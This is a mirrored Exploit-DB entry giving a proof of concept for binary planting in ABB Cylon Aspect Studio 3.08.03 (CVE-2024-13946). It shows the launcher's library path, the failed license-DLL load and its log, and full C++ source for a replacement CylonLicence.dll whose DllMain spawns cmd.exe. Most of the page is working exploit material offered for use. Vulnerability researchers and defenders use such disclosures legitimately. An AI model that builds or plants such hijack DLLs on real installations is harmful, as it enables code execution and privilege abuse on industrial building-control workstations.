bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/local/52306.txt
Exploit-DB d69eaacef8 DB: 2025-05-26 
8 changes to exploits/shellcodes/ghdb

Java-springboot-codebase 1.1 - Arbitrary File Read

ABB Cylon Aspect Studio 3.08.03 - Binary Planting

ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation

Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow

WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass

Microsoft Windows Server 2016 - Win32k Elevation of Privilege

Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
2025-05-26 00:16:29 +00:00

111 lines
No EOL
6.1 KiB
Text
Raw Permalink Blame History

# Exploit Title: ABB Cylon Aspect Studio 3.08.03 - Binary Planting
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: <=3.08.03
# Tested on: Microsoft Windows 10 Home (EN) OpenJDK 64-Bit Server VM Temurin-21.0.6+7
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
# Advisory ID: ZSL-2025-5952
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php
# CVE ID: CVE-2024-13946
# CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946
C:\> type project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll
C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat
REM 64bit parameters
jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat
C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters
C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class
...
...
System.loadLibrary("CylonLicence");
} catch (Throwable t) {}
LoggerUtil.logger.error("Error loading license DLL", t);
}
}
...
...
C:\Aspect\Aspect-Studio-3.08.03> cd logs
C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log
ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main]
java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path
at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867)
at java.lang.Runtime.loadLibrary0(Runtime.java:870)
at java.lang.System.loadLibrary(System.java:1122)
at com.aamatrix.util.AspectStudio.<clinit>(AspectStudio.java:42)
at com.aamatrix.vib.rrobin.CylonLicense.<init>(CylonLicense.java:18)
at com.aamatrix.vib.rrobin.LicenseService.<init>(LicenseService.java:38)
at com.aamatrix.vib.rrobin.LicenseService.<clinit>(LicenseService.java:34)
at com.aamatrix.projectmanager.AspectStudio.<clinit>(AspectStudio.java:52)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:348)
at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70)
...
...
C:\DLL-Mala> type CylonLicence.cpp
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <shellapi.h>
extern "C" __declspec(dllexport)
DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) {
ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL);
return 0;
}
extern "C" __declspec(dllexport)
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Reference in a new issue View git blame Copy permalink